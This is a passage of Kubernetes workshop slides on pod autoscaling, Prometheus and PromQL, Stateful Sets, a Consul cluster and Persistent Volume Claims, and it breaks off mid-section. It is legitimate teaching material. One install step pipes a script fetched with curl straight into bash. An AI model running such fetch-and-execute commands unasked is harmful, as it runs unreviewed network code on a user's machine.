.debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Send traffic to the service - We will use `ab` (Apache Bench) to send traffic .exercise[ - Send a lot of requests to the service, with a concurrency level of 3: ```bash ab -c 3 -n 100000 http://`$CLUSTERIP`/ ``` ] The latency (reported by `httping`) should increase above 3s. The CPU utilization should increase to 100%. (The server is single-threaded and won't go above 100%.) .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Create an HPA policy - There is a helper command to do that for us: `kubectl autoscale` .exercise[ - Create the HPA policy for the `busyhttp` deployment: ```bash kubectl autoscale deployment busyhttp --max=10 ``` ] By default, it will assume a target of 80% CPU usage. This can also be set with `--cpu-percent=`. -- *The autoscaler doesn't seem to work. Why?* .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## What did we miss? - The events stream gives us a hint, but to be honest, it's not very clear: `missing request for cpu` - We forgot to specify a resource request for our Deployment! 
- The HPA target is not an absolute CPU% - It is relative to the CPU requested by the pod .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Adding a CPU request - Let's edit the deployment and add a CPU request - Since our server can use up to 1 core, let's request 1 core .exercise[ - Edit the Deployment definition: ```bash kubectl edit deployment busyhttp ``` - In the `containers` list, add the following block: ```yaml resources: requests: cpu: "1" ``` ] .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Results - After saving and quitting, a rolling update happens (if `ab` or `httping` exits, make sure to restart it) - It will take a minute or two for the HPA to kick in: - the HPA runs every 30 seconds by default - it needs to gather metrics from the metrics server first - If we scale further up (or down), the HPA will react after a few minutes: - it won't scale up if it already scaled in the last 3 minutes - it won't scale down if it already scaled in the last 5 minutes .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## What about other metrics? - The HPA in API group `autoscaling/v1` only supports CPU scaling - The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups: - metrics.k8s.io, aka metrics server (per-Pod CPU and RAM) - custom.metrics.k8s.io, custom metrics per Pod - external.metrics.k8s.io, external metrics (not associated to Pods) - Kubernetes doesn't implement any of these API groups - Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis) - The metrics provided by metrics server are standard; everything else is custom - For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8) .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- ## Cleanup - Since `busyhttp` uses CPU cycles, let's stop it before moving on .exercise[ - Delete the `busyhttp` Deployment: ```bash kubectl delete deployment busyhttp ``` ] ??? 
:EN:- Auto-scaling resources :FR:- *Auto-scaling* (dimensionnement automatique) des ressources .debug[[k8s/horizontal-pod-autoscaler.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/horizontal-pod-autoscaler.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/train-of-containers-2.jpg)] --- name: toc-collecting-metrics-with-prometheus class: title Collecting metrics with Prometheus .nav[ [Previous section](#toc-the-horizontal-pod-autoscaler) | [Back to table of contents](#toc-module-3) | [Next section](#toc-stateful-sets) ] .debug[(automatically generated title slide)] --- # Collecting metrics with Prometheus - Prometheus is an open-source monitoring system including: - multiple *service discovery* backends to figure out which metrics to collect - a *scraper* to collect these metrics - an efficient *time series database* to store these metrics - a specific query language (PromQL) to query these time series - an *alert manager* to notify us according to metrics values or trends - We are going to use it to collect and query some metrics on our Kubernetes cluster .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Why Prometheus? - We don't endorse Prometheus more or less than any other system - It's relatively well integrated within the cloud-native ecosystem - It can be self-hosted (this is useful for tutorials like this) - It can be used for deployments of varying complexity: - one binary and 10 lines of configuration to get started - all the way to thousands of nodes and millions of metrics .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Exposing metrics to Prometheus - Prometheus obtains metrics and their values by querying *exporters* - An exporter serves metrics over HTTP, in plain text - This is what the *node exporter* looks like: http://demo.robustperception.io:9100/metrics - Prometheus itself exposes its own internal metrics, too: http://demo.robustperception.io:9090/metrics - If you want to expose custom metrics to Prometheus: - serve a text page like these, and you're good to go - libraries are available in various languages to help with quantiles etc. .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## How Prometheus gets these metrics - The *Prometheus server* will *scrape* URLs like these at regular intervals (by default: every minute; can be more/less frequent) - The list of URLs to scrape (the *scrape targets*) is defined in configuration .footnote[Worried about the overhead of parsing a text format?
Check this [comparison](https://github.com/RichiH/OpenMetrics/blob/master/markdown/protobuf_vs_text.md) of the text format with the (now deprecated) protobuf format!] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Defining scrape targets This is maybe the simplest configuration file for Prometheus: ```yaml scrape_configs: - job_name: 'prometheus' static_configs: - targets: ['localhost:9090'] ``` - In this configuration, Prometheus collects its own internal metrics - A typical configuration file will have multiple `scrape_configs` - In this configuration, the list of targets is fixed - A typical configuration file will use dynamic service discovery .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Service discovery This configuration file will leverage existing DNS `A` records: ```yaml scrape_configs: - ... - job_name: 'node' dns_sd_configs: - names: ['api-backends.dc-paris-2.enix.io'] type: 'A' port: 9100 ``` - In this configuration, Prometheus resolves the provided name(s) (here, `api-backends.dc-paris-2.enix.io`) - Each resulting IP address is added as a target on port 9100 .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Dynamic service discovery - In the DNS example, the names are re-resolved at regular intervals - As DNS records are created/updated/removed, scrape targets change as well - Existing data (previously collected metrics) is not deleted - Other service discovery backends work in a similar fashion .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Other service discovery mechanisms - Prometheus can connect to e.g. a cloud API to list instances - Or to the Kubernetes API to list nodes, pods, services ... - Or a service like Consul, Zookeeper, etcd, to list applications - The resulting configurations files are *way more complex* (but don't worry, we won't need to write them ourselves) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Time series database - We could wonder, "why do we need a specialized database?" - One metrics data point = metrics ID + timestamp + value - With a classic SQL or noSQL data store, that's at least 160 bits of data + indexes - Prometheus is way more efficient, without sacrificing performance (it will even be gentler on the I/O subsystem since it needs to write less) - Would you like to know more? Check this video: [Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Checking if Prometheus is installed - Before trying to install Prometheus, let's check if it's already there .exercise[ - Look for services with a label `app=prometheus` across all namespaces: ```bash kubectl get services --selector=app=prometheus --all-namespaces ``` ] If we see a `NodePort` service called `prometheus-server`, we're good! (We can then skip to "Connecting to the Prometheus web UI".) 
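To give an idea of what Kubernetes-based service discovery looks like (mentioned a few slides back), here is a minimal sketch; real configurations, like the one installed by the Helm chart used below, add TLS settings, authorization, and relabeling rules:

```yaml
scrape_configs:
- job_name: 'kubernetes-nodes'
  kubernetes_sd_configs:
  - role: node       # discover every node registered in the cluster
- job_name: 'kubernetes-pods'
  kubernetes_sd_configs:
  - role: pod        # discover every pod; relabeling usually filters them
```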
.debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Running Prometheus on our cluster We need to: - Run the Prometheus server in a pod (using e.g. a Deployment to ensure that it keeps running) - Expose the Prometheus server web UI (e.g. with a NodePort) - Run the *node exporter* on each node (with a Daemon Set) - Set up a Service Account so that Prometheus can query the Kubernetes API - Configure the Prometheus server (storing the configuration in a Config Map for easy updates) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Helm charts to the rescue - To make our lives easier, we are going to use a Helm chart - The Helm chart will take care of all the steps explained above (including some extra features that we don't need, but won't hurt) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Step 1: install Helm - If we already installed Helm earlier, this command won't break anything .exercise[ - Install the Helm CLI: ```bash curl https://raw.githubusercontent.com/kubernetes/helm/master/scripts/get-helm-3 \ | bash ``` ] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Step 2: add the `stable` repo - This will add the repository containing the chart for Prometheus - This command is idempotent (it won't break anything if the repository was already added) .exercise[ - Add the repository: ```bash helm repo add stable https://kubernetes-charts.storage.googleapis.com/ ``` ] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Step 3: install Prometheus - The following command, just like the previous ones, is idempotent (it won't error out if Prometheus is already installed) .exercise[ - Install Prometheus on our cluster: ```bash helm upgrade prometheus stable/prometheus \ --install \ --namespace kube-system \ --set server.service.type=NodePort \ --set server.service.nodePort=30090 \ --set server.persistentVolume.enabled=false \ --set alertmanager.enabled=false ``` ] Curious about all these flags? They're explained in the next slide. .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Explaining all the Helm flags - `helm upgrade prometheus` → upgrade release "prometheus" to the latest version... (a "release" is a unique name given to an app deployed with Helm) - `stable/prometheus` → ... 
of the chart `prometheus` in repo `stable` - `--install` → if the app doesn't exist, create it - `--namespace kube-system` → put it in that specific namespace - And set the following *values* when rendering the chart's templates: - `server.service.type=NodePort` → expose the Prometheus server with a NodePort - `server.service.nodePort=30090` → set the specific NodePort number to use - `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim - `alertmanager.enabled=false` → disable the alert manager entirely .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Connecting to the Prometheus web UI - Let's connect to the web UI and see what we can do .exercise[ - Figure out the NodePort that was allocated to the Prometheus server: ```bash kubectl get svc --all-namespaces | grep prometheus-server ``` - With your browser, connect to that port ] .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Querying some metrics - This is easy... if you are familiar with PromQL .exercise[ - Click on "Graph", and in "expression", paste the following: ``` sum by (instance) ( irate( container_cpu_usage_seconds_total{ pod_name=~"worker.*" }[5m] ) ) ``` ] - Click on the blue "Execute" button and on the "Graph" tab just below - We see the cumulated CPU usage of worker pods for each node
(if we just deployed Prometheus, there won't be much data to see, though) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Getting started with PromQL - We can't learn PromQL in just 5 minutes - But we can cover the basics to get an idea of what is possible (and have some keywords and pointers) - We are going to break down the query above (building it one step at a time) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Graphing one metric across all tags This query will show us CPU usage across all containers: ``` container_cpu_usage_seconds_total ``` - The suffix of the metric name tells us: - the unit (seconds of CPU) - that it's the total used since the container creation - Since it's a "total," it is an increasing quantity (we need to compute the derivative if we want e.g. CPU % over time) - We see that the metrics retrieved have *tags* attached to them .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Selecting metrics with tags This query will show us only metrics for worker containers: ``` container_cpu_usage_seconds_total{pod_name=~"worker.*"} ``` - The `=~` operator allows regex matching - We select all the pods with a name starting with `worker` (it would be better to use labels to select pods; more on that later) - The result is a smaller set of containers .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Transforming counters into rates This query will show us CPU usage % instead of total seconds used: ``` 100*irate(container_cpu_usage_seconds_total{pod_name=~"worker.*"}[5m]) ``` - The [`irate`](https://prometheus.io/docs/prometheus/latest/querying/functions/#irate) operator computes the "per-second instant rate of increase" - `rate` is similar but allows decreasing counters and negative values - with `irate`, if a counter goes back to zero, we don't get a negative spike - The `[5m]` tells how far to look back if there is a gap in the data - And we multiply by 100 (the `100*` prefix) to get CPU % usage .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Aggregation operators This query sums the CPU usage per node: ``` sum by (instance) ( irate(container_cpu_usage_seconds_total{pod_name=~"worker.*"}[5m]) ) ``` - `instance` corresponds to the node on which the container is running - `sum by (instance) (...)` computes the sum for each instance - Note: all the other tags are collapsed (in other words, the resulting graph only shows the `instance` tag) - PromQL supports many more [aggregation operators](https://prometheus.io/docs/prometheus/latest/querying/operators/#aggregation-operators) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## What kind of metrics can we collect? - Node metrics (related to physical or virtual machines) - Container metrics (resource usage per container) - Databases, message queues, load balancers, ... (check out this [list of exporters](https://prometheus.io/docs/instrumenting/exporters/)!) - Instrumentation (=deluxe `printf` for our code) - Business metrics (customers served, revenue, ...)
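For instance, once container metrics are collected, a query in the same spirit as the CPU example above can show memory usage per namespace. This is a sketch: it assumes that the cAdvisor metric `container_memory_usage_bytes` is being scraped, and the exact tag names depend on the exporter configuration.

```
sum by (namespace) (
  container_memory_usage_bytes{image!=""}
)
```

(The `image!=""` selector keeps only actual containers, filtering out the aggregate time series that cAdvisor also exposes.)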
.debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Node metrics - CPU, RAM, disk usage on the whole node - Total number of processes running, and their states - Number of open files, sockets, and their states - I/O activity (disk, network), per operation or volume - Physical/hardware (when applicable): temperature, fan speed... - ...and much more! .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Container metrics - Similar to node metrics, but not totally identical - RAM breakdown will be different - active vs inactive memory - some memory is *shared* between containers, and specially accounted for - I/O activity is also harder to track - async writes can cause deferred "charges" - some page-ins are also shared between containers For details about container metrics, see:
http://jpetazzo.github.io/2013/10/08/docker-containers-metrics/ .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Application metrics - Arbitrary metrics related to your application and business - System performance: request latency, error rate... - Volume information: number of rows in database, message queue size... - Business data: inventory, items sold, revenue... .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: extra-details ## Detecting scrape targets - Prometheus can leverage Kubernetes service discovery (with proper configuration) - Services or pods can be annotated with: - `prometheus.io/scrape: true` to enable scraping - `prometheus.io/port: 9090` to indicate the port number - `prometheus.io/path: /metrics` to indicate the URI (`/metrics` by default) - Prometheus will detect and scrape these (without needing a restart or reload) .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Querying labels - What if we want to get metrics for containers belonging to a pod tagged `worker`? - The cAdvisor exporter does not give us Kubernetes labels - Kubernetes labels are exposed through another exporter - We can see Kubernetes labels through the metric `kube_pod_labels` (each container appears as a time series with a constant value of `1`) - Prometheus *kind of* supports "joins" between time series - But only if the names of the tags match exactly .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## Unfortunately ... - The cAdvisor exporter uses tag `pod_name` for the name of a pod - The Kubernetes service endpoints exporter uses tag `pod` instead - See [this blog post](https://www.robustperception.io/exposing-the-software-version-to-prometheus) or [this other one](https://www.weave.works/blog/aggregating-pod-resource-cpu-memory-usage-arbitrary-labels-prometheus/) to see how to perform "joins" - Alas, Prometheus cannot "join" time series with different labels (see [Prometheus issue #2204](https://github.com/prometheus/prometheus/issues/2204) for the rationale) - There is a workaround involving relabeling, but it's "not cheap" - see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview - or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- ## In practice - Grafana is a beautiful (and useful) frontend to display all kinds of graphs - Not everyone needs to know Prometheus, PromQL, Grafana, etc. - But in a team, it is valuable to have at least one person who knows them - That person can set up queries and dashboards for the rest of the team - It's a little bit like knowing how to optimize SQL queries, Dockerfiles... Don't panic if you don't know these tools! ...But make sure at least one person in your team is on it 💯 ???
:EN:- Collecting metrics with Prometheus :FR:- Collecter des métriques avec Prometheus .debug[[k8s/prometheus.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/prometheus.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/two-containers-on-a-truck.jpg)] --- name: toc-stateful-sets class: title Stateful sets .nav[ [Previous section](#toc-collecting-metrics-with-prometheus) | [Back to table of contents](#toc-module-3) | [Next section](#toc-running-a-consul-cluster) ] .debug[(automatically generated title slide)] --- # Stateful sets - Stateful sets are a type of resource in the Kubernetes API (like pods, deployments, services...) - They offer mechanisms to deploy scaled stateful applications - At first glance, they look like *deployments*: - a stateful set defines a pod spec and a number of replicas *R* - it will make sure that *R* copies of the pod are running - that number can be changed while the stateful set is running - updating the pod spec will cause a rolling update to happen - But they also have some significant differences .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Stateful sets unique features - Pods in a stateful set are numbered (from 0 to *R-1*) and ordered - They are started and updated in order (from 0 to *R-1*) - A pod is started (or updated) only when the previous one is ready - They are stopped in reverse order (from *R-1* to 0) - Each pod knows its identity (i.e. which number it is in the set) - Each pod can discover the IP address of the others easily - The pods can persist data on attached volumes 🤔 Wait a minute ... Can't we already attach volumes to pods and deployments? .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Revisiting volumes - [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes: - sharing data between containers in a pod - exposing configuration information and secrets to containers - accessing storage systems - Let's see examples of the latter usage .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Volume types - There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available: - public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...) - private cloud storage (Cinder, VsphereVolume...) - traditional storage systems (NFS, iSCSI, FC...) - distributed storage (Ceph, Glusterfs, Portworx...) - Using a persistent volume requires: - creating the volume out-of-band (outside of the Kubernetes API) - referencing the volume in the pod description, with all its parameters .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Using a cloud volume Here is a pod definition using an AWS EBS volume (that has to be created first): ```yaml apiVersion: v1 kind: Pod metadata: name: pod-using-my-ebs-volume spec: containers: - image: ...
name: container-using-my-ebs-volume volumeMounts: - mountPath: /my-ebs name: my-ebs-volume volumes: - name: my-ebs-volume awsElasticBlockStore: volumeID: vol-049df61146c4d7901 fsType: ext4 ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Using an NFS volume Here is another example using a volume on an NFS server: ```yaml apiVersion: v1 kind: Pod metadata: name: pod-using-my-nfs-volume spec: containers: - image: ... name: container-using-my-nfs-volume volumeMounts: - mountPath: /my-nfs name: my-nfs-volume volumes: - name: my-nfs-volume nfs: server: 192.168.0.55 path: "/exports/assets" ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Shortcomings of volumes - Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API (we can't just use `kubectl apply/create/delete/...` to manage them) - If a Deployment uses a volume, all replicas end up using the same volume - That volume must then support concurrent access - some volumes do (e.g. NFS servers support multiple read/write access) - some volumes support concurrent reads - some volumes support concurrent access for colocated pods - What we really need is a way for each replica to have its own volume .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Individual volumes - The Pods of a Stateful set can have individual volumes (i.e. in a Stateful set with 3 replicas, there will be 3 volumes) - These volumes can be either: - allocated from a pool of pre-existing volumes (disks, partitions ...) - created dynamically using a storage system - This introduces a bunch of new Kubernetes resource types: Persistent Volumes, Persistent Volume Claims, Storage Classes (and also `volumeClaimTemplates`, that appear within Stateful Set manifests!) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Stateful set recap - A Stateful set manages a number of identical pods (like a Deployment) - These pods are numbered, and started/upgraded/stopped in a specific order - These pods are aware of their number (e.g., #0 can decide to be the primary, and #1 can be secondary) - These pods can find the IP addresses of the other pods in the set (through a *headless service*) - These pods can each have their own persistent storage (Deployments cannot do that) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/wall-of-containers.jpeg)] --- name: toc-running-a-consul-cluster class: title Running a Consul cluster .nav[ [Previous section](#toc-stateful-sets) | [Back to table of contents](#toc-module-4) | [Next section](#toc-persistent-volumes-claims) ] .debug[(automatically generated title slide)] --- # Running a Consul cluster - Here is a good use-case for Stateful sets!
- We are going to deploy a Consul cluster with 3 nodes - Consul is a highly-available key/value store (like etcd or Zookeeper) - One easy way to bootstrap a cluster is to tell each node: - the addresses of other nodes - how many nodes are expected (to know when quorum is reached) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Bootstrapping a Consul cluster *After reading the Consul documentation carefully (and/or asking around), we figure out the minimal command-line to run our Consul cluster.* ``` consul agent -data-dir=/consul/data -client=0.0.0.0 -server -ui \ -bootstrap-expect=3 \ -retry-join=`X.X.X.X` \ -retry-join=`Y.Y.Y.Y` ``` - Replace X.X.X.X and Y.Y.Y.Y with the addresses of other nodes - The same command-line can be used on all nodes (convenient!) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Cloud Auto-join - Since version 1.4.0, Consul can use the Kubernetes API to find its peers - This is called [Cloud Auto-join] - Instead of passing an IP address, we need to pass a parameter like this: ``` consul agent -retry-join "provider=k8s label_selector=\"app=consul\"" ``` - Consul needs to be able to talk to the Kubernetes API - We can provide a `kubeconfig` file - If Consul runs in a pod, it will use the *service account* of the pod [Cloud Auto-join]: https://www.consul.io/docs/agent/cloud-auto-join.html#kubernetes-k8s- .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Setting up Cloud auto-join - We need to create a service account for Consul - We need to create a role that can `list` and `get` pods - We need to bind that role to the service account - And of course, we need to make sure that Consul pods use that service account .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Putting it all together - The file `k8s/consul.yaml` defines the required resources (service account, cluster role, cluster role binding, service, stateful set) - It has a few extra touches: - a `podAntiAffinity` prevents two pods from running on the same node - a `preStop` hook makes the pod leave the cluster when it is shut down gracefully This was inspired by this [excellent tutorial](https://github.com/kelseyhightower/consul-on-kubernetes) by Kelsey Hightower. Some features from the original tutorial (TLS authentication between nodes and encryption of gossip traffic) were removed for simplicity. .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Running our Consul cluster - We'll use the provided YAML file .exercise[ - Create the stateful set and associated service: ```bash kubectl apply -f ~/container.training/k8s/consul.yaml ``` - Check the logs as the pods come up one after another: ```bash stern consul ``` - Check the health of the cluster: ```bash kubectl exec consul-0 consul members ``` ] .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Caveats - We aren't using actual persistence yet (no `volumeClaimTemplate`, Persistent Volume, etc.) - What happens if we lose a pod?
- a new pod gets rescheduled (with an empty state) - the new pod tries to connect to the two others - it will be accepted (after 1-2 minutes of instability) - and it will retrieve the data from the other pods .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Failure modes - What happens if we lose two pods? - manual repair will be required - we will need to instruct the remaining one to act solo - then rejoin new pods - What happens if we lose three pods? (aka all of them) - we lose all the data (ouch) - If we run Consul without persistent storage, backups are a good idea! .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: pic .interstitial[![Image separating from the next module](https://gallant-turing-d0d520.netlify.com/containers/Container-Ship-Freighter-Navigation-Elbe-Romance-1782991.jpg)] --- name: toc-persistent-volumes-claims class: title Persistent Volume Claims .nav[ [Previous section](#toc-running-a-consul-cluster) | [Back to table of contents](#toc-module-4) | [Next section](#toc-local-persistent-volumes) ] .debug[(automatically generated title slide)] --- # Persistent Volume Claims - Our Pods can use a special volume type: a *Persistent Volume Claim* - A Persistent Volume Claim (PVC) is also a Kubernetes resource (visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`) - A PVC is not a volume; it is a *request for a volume* - It should indicate at least: - the size of the volume (e.g. "5 GiB") - the access mode (e.g. "read-write by a single pod") .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## What's in a PVC? - A PVC contains at least: - a list of *access modes* (ReadWriteOnce, ReadOnlyMany, ReadWriteMany) - a size (interpreted as the minimal storage space needed) - It can also contain optional elements: - a selector (to restrict which actual volumes it can use) - a *storage class* (used by dynamic provisioning, more on that later) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## What does a PVC look like? Here is a manifest for a basic PVC: ```yaml kind: PersistentVolumeClaim apiVersion: v1 metadata: name: my-claim spec: accessModes: - ReadWriteOnce resources: requests: storage: 1Gi ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Using a Persistent Volume Claim Here is a Pod definition like the ones shown earlier, but using a PVC: ```yaml apiVersion: v1 kind: Pod metadata: name: pod-using-a-claim spec: containers: - image: ...
name: container-using-a-claim volumeMounts: - mountPath: /my-vol name: my-volume volumes: - name: my-volume persistentVolumeClaim: claimName: my-claim ``` .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Creating and using Persistent Volume Claims - PVCs can be created manually and used explicitly (as shown on the previous slides) - They can also be created and used through Stateful Sets (this will be shown later) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Lifecycle of Persistent Volume Claims - When a PVC is created, it starts existing in "Unbound" state (without an associated volume) - A Pod referencing an unbound PVC will not start (the scheduler will wait until the PVC is bound to place it) - A special controller continuously monitors PVCs to associate them with PVs - If no PV is available, one must be created: - manually (by operator intervention) - using a *dynamic provisioner* (more on that later) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- class: extra-details ## Which PV gets associated with a PVC? - The PV must satisfy the PVC constraints (access mode, size, optional selector, optional storage class) - The PVs with the closest access mode are picked - Then the PVs with the closest size - It is possible to specify a `claimRef` when creating a PV (this will associate it to the specified PVC, but only if the PV satisfies all the requirements of the PVC; otherwise another PV might end up being picked) - For all the details about the PersistentVolumeClaimBinder, check [this doc](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/storage/persistent-storage.md#matching-and-binding) .debug[[k8s/statefulsets.md](https://github.com/jpetazzo/container.training/tree/2020-06-enix/slides/k8s/statefulsets.md)] --- ## Persistent Volume Claims and Stateful sets - A Stateful set can define one (or more) `volumeClaimTemplate` - Each `volumeClaimTemplate` will create one Persistent Volume Claim per pod - Each pod will therefore have its own individual volume - These volumes are numbered (like the pods) - Example: - a Stateful set is named `db` - it is scaled to 3 replicas - it has a 